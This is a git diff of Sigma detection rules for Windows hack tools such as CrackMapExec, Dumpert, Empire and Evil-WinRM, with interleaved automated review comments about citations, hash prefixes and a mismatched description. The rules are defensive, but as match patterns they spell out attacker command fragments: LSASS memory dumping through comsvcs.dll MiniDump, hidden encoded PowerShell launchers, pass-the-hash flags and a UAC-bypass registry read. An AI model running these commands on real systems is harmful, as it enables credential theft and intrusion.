a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml 
@@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Execution id: 42a993dd-bb3e-48c8-b372-4d6684c4106c status: test -description: This rule detect common flag combinations used by CrackMapExec in order - to detect its use even if the binary has been replaced. +description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local - https://www.mandiant.com/resources/telegram-malware-iranian-espionage @@ -34,45 +33,45 @@ detection: selection_binary: Image|endswith: \crackmapexec.exe selection_special: - CommandLine|contains: ' -M pe_inject ' + CommandLine|contains: ' -M pe_inject ' selection_execute: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -x ' selection_hash: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' - - ' -H ''NTHASH''' + - " -H 'NTHASH'" selection_module_mssql: - CommandLine|contains|all: + CommandLine|contains|all: - ' mssql ' - ' -u ' - ' -p ' - ' -M ' - ' -d ' selection_module_smb1: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -H ' - ' -M ' - ' -o ' selection_module_smb2: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -p ' - ' --local-auth' part_localauth_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' part_localauth_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' 10.' - ' 192.168.' - '/24 ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml index 034db3c98..3c64a47cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml @@ -23,11 +23,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless) - cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:109 (fileless output via share) - cmd.exe /C * > \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:111 (fileless output via share) - cmd.exe /C * > *\\Temp\\* 2>&1 + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L136 (PowerShell execution with obfuscation) - powershell.exe -exec bypass -noni -nop -w 1 -C " + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L160 (PowerShell execution without obfuscation) - 'powershell.exe -noni -nop -w 1 -enc ' condition: process_creation and selection falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml index 4c7bd78ab..1ddfe9ab3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Process Patterns id: f26307d8-14cd-47e3-a26b-4b4769f24af6 status: test -description: Detects suspicious process patterns found in logs when CrackMapExec is - used +description: Detects suspicious process patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) 
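Review bot: The added comments `# cme/protocols/smb/atexec.py:109` and `# cme/protocols/smb/atexec.py:111` cite bare line numbers without the pinned commit that the two powershell.py comments in the same hunk carry, so they will drift as upstream changes; the `# Line 343ff` comment added in proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml has the same problem and names no file at all. Suggest anchoring them the same way as the permalinks, e.g. `# cme/protocols/smb/atexec.py#L109 at <upstream commit> (fileless output via share)`, and for the obfuscation rule `# cme/helpers/powershell.py L343ff at commit 0a49f753 cited in references`. The wmiexec.py comment could take the same commit so all five patterns are traceable to one source revision.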
@@ -20,27 +19,27 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_lsass_dump1: - CommandLine|contains|all: + CommandLine|contains|all: - 'tasklist /fi ' - Imagename eq lsass.exe - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd.exe /r ' - 'cmd.exe /k ' - 'cmd /c ' - 'cmd /r ' - 'cmd /k ' - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_lsass_dump2: - CommandLine|contains|all: + CommandLine|contains|all: - do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump - \Windows\Temp\ - ' full' - '%%B' selection_procdump: - CommandLine|contains|all: + CommandLine|contains|all: - tasklist /v /fo csv - findstr /i "lsass" condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml index b2ae28ac1..22ca13f71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec PowerShell Obfuscation id: 6f8b3439-a203-45dc-a88b-abf57ea15ccf status: test -description: The CrachMapExec pentesting framework implements a PowerShell obfuscation - with some static strings detected by this rule. +description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. references: - https://github.com/byt3bl33d3r/CrackMapExec - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242 
@@ -23,20 +22,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - join*split + # Line 343ff - ( $ShellId[1]+$ShellId[13]+'x') - ( $PSHome[*]+$PSHOME[*]+ - ( $env:Public[13]+$env:Public[5]+'x') - ( $env:ComSpec[4,*,25]-Join'') - - '[1,3]+''x''-Join'''')' + - "[1,3]+'x'-Join'')" condition: process_creation and (all of selection_*) fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml index 6da1dd9da..dce39d347 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml @@ -1,8 +1,7 @@ title: HackTool - CreateMiniDump Execution id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d status: test -description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process - memory for credential extraction on the attacker's machine +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass author: Florian Roth (Nextron Systems) 
@@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \CreateMiniDump.exe - - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f - - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f + - Image|endswith: \CreateMiniDump.exe + - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f + - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml index a356ac39a..d76009983 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml @@ -1,10 +1,9 @@ title: HackTool - DInjector PowerShell Cradle Execution id: d78b5d61-187d-44b6-bf02-93486a80de5a status: test -description: Detects the use of the Dinject PowerShell cradle based on the specific - flags +description: Detects the use of the Dinject PowerShell cradle based on the specific flags references: - - https://github.com/snovvcrash/DInjector + - https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork author: Florian Roth (Nextron Systems) date: 2021/12/07 modified: 2023/02/04 @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /am51' - ' /password' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml index 49ed8b151..55b7f897a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml 
@@ -1,8 +1,7 @@ title: HackTool - Dumpert Process Dumper Execution id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 status: test -description: Detects the use of Dumpert process dumper, which dumps the lsass.exe - process memory +description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Hashes|contains: 09D278F9DE118EF09163C6140255C690 - - CommandLine|contains: Dumpert.dll + - Hashes|contains: 09D278F9DE118EF09163C6140255C690 + - CommandLine|contains: Dumpert.dll condition: process_creation and selection falsepositives: - Very unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml index 59cb9e8ac..26500619a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml @@ -1,11 +1,8 @@ title: HackTool - EDRSilencer Execution id: eb2d07d4-49cb-4523-801a-da002df36602 status: experimental -description: 'Detects the execution of EDRSilencer, a tool that leverages Windows - Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents - from reporting security events to the server based on PE metadata information. - - ' +description: | + Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. references: - https://github.com/netero1010/EDRSilencer author: '@gott_cyber' 
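Review bot: `Hashes|contains: 09D278F9DE118EF09163C6140255C690` in the re-indented selection carries no `IMPHASH=` prefix, unlike the sibling rules (for example `Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f` in proc_creation_win_hktl_createminidump.yml) and unlike proc_creation_win_hktl_execution_via_imphashes.yml, which labels this same value as a Dumpert import hash. A bare substring match also offers no `Imphash:` alternative for backends that expose the import hash as its own field, and it would fire on the string wherever it appears inside the combined Hashes field. Suggest `- Hashes|contains: IMPHASH=09D278F9DE118EF09163C6140255C690` plus `- Imphash: 09D278F9DE118EF09163C6140255C690`, which presumably fits since the selection is already a list of alternatives.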
@@ -22,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \EDRSilencer.exe - - OriginalFileName: EDRSilencer.exe - - Description|contains: EDRSilencer + - Image|endswith: \EDRSilencer.exe + - OriginalFileName: EDRSilencer.exe + - Description|contains: EDRSilencer condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml index 0e5301fba..92109dd16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -sta -NonI -W Hidden -Enc ' - ' -noP -sta -w 1 -enc ' - ' -NoP -NonI -W Hidden -enc ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml index 2ce827d88..690a7e00d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)' - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml index 0766bc7f4..09177cecb 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml @@ -1,9 +1,7 @@ title: HackTool - WinRM Access Via Evil-WinRM id: a197e378-d31b-41c0-9635-cfdf1c1bb423 status: test -description: Adversaries may use Valid Accounts to log into a computer using the Remote - Desktop Protocol (RDP). The adversary may then perform actions as the logged-on - user. +description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm - https://github.com/Hackplayers/evil-winrm @@ -23,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_mstsc: Image|endswith: \ruby.exe - CommandLine|contains|all: + CommandLine|contains|all: - '-i ' - '-u ' - '-p ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml index 1cf97d600..390c1f3c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml @@ -1,8 +1,7 @@ title: Hacktool Execution - Imphash id: 24e3e58a-646b-4b50-adef-02ef935b9fc8 status: test -description: Detects the execution of different Windows based hacktools via their - import hash (imphash) even if the files have been renamed +description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed references: - Internal Research author: Florian Roth (Nextron Systems) 
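Review bot: The re-flowed description still says adversaries log in `using the Remote Desktop Protocol (RDP)`, but the rule matches `ruby.exe` run with `-i`, `-u` and `-p`, i.e. Evil-WinRM over WinRM, as the title and the T1021.006 atomic test in references say; the text looks copied from an RDP rule. Suggest `description: Detects the execution of Evil-WinRM, a WinRM shell used with valid accounts to run commands on a remote host as the logged-on user.` The selection in the second hunk is also named `selection_mstsc`, which is the RDP client, so renaming it `selection_ruby` would keep the rule readable.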
@@ -21,182 +20,182 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 - - 3a19059bd7688cb88e70005f18efc439 - - bf6223a49e45d99094406777eb6004ba - - 23867a89c2b8fc733be6cf5ef902f2d1 - - a37ff327f8d48e8a4d2f757e1b6e70bc - - f9a28c458284584a93b14216308d31bd - - 6118619783fc175bc7ebecff0769b46e - - 959a83047e80ab68b368fdb3f4c6e4ea - - 563233bfa169acc7892451f71ad5850a - - 87575cb7a0e0700eb37f2e3668671a08 - - 13f08707f759af6003837a150a371ba1 - - 1781f06048a7e58b323f0b9259be798b - - 233f85f2d4bc9d6521a6caae11a1e7f5 - - 24af2584cbf4d60bbe5c6d1b31b3be6d - - 632969ddf6dbf4e0f53424b75e4b91f2 - - 713c29b396b907ed71a72482759ed757 - - 749a7bb1f0b4c4455949c0b2bf7f9e9f - - 8628b2608957a6b0c6330ac3de28ce2e - - 8b114550386e31895dfab371e741123d - - 94cb940a1a6b65bed4d5a8f849ce9793 - - 9d68781980370e00e0bd939ee5e6c141 - - b18a1401ff8f444056d29450fbc0a6ce - - cb567f9498452721d77a451374955f5f - - 730073214094cd328547bf1f72289752 - - 17b461a082950fc6332228572138b80c - - dc25ee78e2ef4d36faa0badf1e7461c9 - - 819b19d53ca6736448f9325a85736792 - - 829da329ce140d873b4a8bde2cbfaa7e - - c547f2e66061a8dffb6f5a3ff63c0a74 - - 0588081ab0e63ba785938467e1b10cca - - 0d9ec08bac6c07d9987dfd0f1506587c - - bc129092b71c89b4d4c8cdf8ea590b29 - - 4da924cf622d039d58bce71cdf05d242 - - e7a3a5c377e2d29324093377d7db1c66 - - 9a9dbec5c62f0380b4fa5fd31deffedf - - af8a3976ad71e5d5fdfb67ddb8dadfce - - 0c477898bbf137bbd6f2a54e3b805ff4 - - 0ca9f02b537bcea20d4ea5eb1a9fe338 - - 3ab3655e5a14d4eefc547f4781bf7f9e - - e6f9d5152da699934b30daab206471f6 - - 3ad59991ccf1d67339b319b15a41b35d - - ffdd59e0318b85a3e480874d9796d872 - - 0cf479628d7cc1ea25ec7998a92f5051 - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 - - d6d0f80386e1380d05cb78e871bc72b1 - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - ada161bf41b8e5e9132858cb54cab5fb - - 2a1bc4913cd5ecb0434df07cb675b798 - - 11083e75553baae21dc89ce8f9a195e4 - - 
a23d29c9e566f2fa8ffbb79267f5df80 - - 4a07f944a83e8a7c2525efa35dd30e2f - - 767637c23bb42cd5d7397cf58b0be688 - - 14c4e4c72ba075e9069ee67f39188ad8 - - 3c782813d4afce07bbfc5a9772acdbdc - - 7d010c6bb6a3726f327f7e239166d127 - - 89159ba4dd04e4ce5559f132a9964eb3 - - 6f33f4a5fc42b8cec7314947bd13f30f - - 5834ed4291bdeb928270428ebbaf7604 - - 5a8a8a43f25485e7ee1b201edcbc7a38 - - dc7d30b90b2d8abf664fbed2b1b59894 - - 41923ea1f824fe63ea5beb84db7a3e74 - - 3de09703c8e79ed2ca3f01074719906b - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - 32089b8851bbf8bc2d014e9f37288c83 - - 09D278F9DE118EF09163C6140255C690 - - 03866661686829d806989e2fc5a72606 - - e57401fbdadcd4571ff385ab82bd5d6d - - 84B763C45C0E4A3E7CA5548C710DB4EE - - 19584675d94829987952432e018d5056 - - 330768a4f172e10acb6287b87289d83b - - 885c99ccfbe77d1cbfcb9c4e7c1a3313 - - 22a22bc9e4e0d2f189f1ea01748816ac - - 7fa30e6bb7e8e8a69155636e50bf1b28 - - 96df3a3731912449521f6f8d183279b1 - - 7e6cf3ff4576581271ac8a313b2aab46 - - 51791678f351c03a0eb4e2a7b05c6e17 - - 25ce42b079282632708fc846129e98a5 - - 021bcca20ba3381b11bdde26b4e62f20 - - 59223b5f52d8799d38e0754855cbdf42 - - 81e75d8f1d276c156653d3d8813e4a43 - - 17244e8b6b8227e57fe709ccad421420 - - 5b76da3acdedc8a5cdf23a798b5936b4 - - cb2b65bb77d995cc1c0e5df1c860133c - - 40445337761d80cf465136fafb1f63e6 - - 8a790f401b29fa87bc1e56f7272b3aa6 - - Hashes|contains: - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 - - IMPHASH=bf6223a49e45d99094406777eb6004ba - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC - - IMPHASH=F9A28C458284584A93B14216308D31BD - - IMPHASH=6118619783FC175BC7EBECFF0769B46E - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA - - IMPHASH=563233BFA169ACC7892451F71AD5850A - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 - - IMPHASH=13F08707F759AF6003837A150A371BA1 - - IMPHASH=1781F06048A7E58B323F0B9259BE798B - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 - - 
IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 - - IMPHASH=713C29B396B907ED71A72482759ED757 - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E - - IMPHASH=8B114550386E31895DFAB371E741123D - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE - - IMPHASH=CB567F9498452721D77A451374955F5F - - IMPHASH=730073214094CD328547BF1F72289752 - - IMPHASH=17B461A082950FC6332228572138B80C - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 - - IMPHASH=819B19D53CA6736448F9325A85736792 - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 - - IMPHASH=0588081AB0E63BA785938467E1B10CCA - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 - - 
IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 - - IMPHASH=09D278F9DE118EF09163C6140255C690 - - IMPHASH=03866661686829d806989e2fc5a72606 - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE - - IMPHASH=19584675D94829987952432E018D5056 - - IMPHASH=330768A4F172E10ACB6287B87289D83B - - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 - - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC - - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 - - IMPHASH=96DF3A3731912449521F6F8D183279B1 - - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 - - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 - - IMPHASH=25CE42B079282632708FC846129E98A5 - - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 - - IMPHASH=59223B5F52D8799D38E0754855CBDF42 - - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 - - IMPHASH=17244E8B6B8227E57FE709CCAD421420 - - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 - - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C - - IMPHASH=40445337761D80CF465136FAFB1F63E6 - - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - f9a28c458284584a93b14216308d31bd # JuicyPotatoNG + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # 
Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 
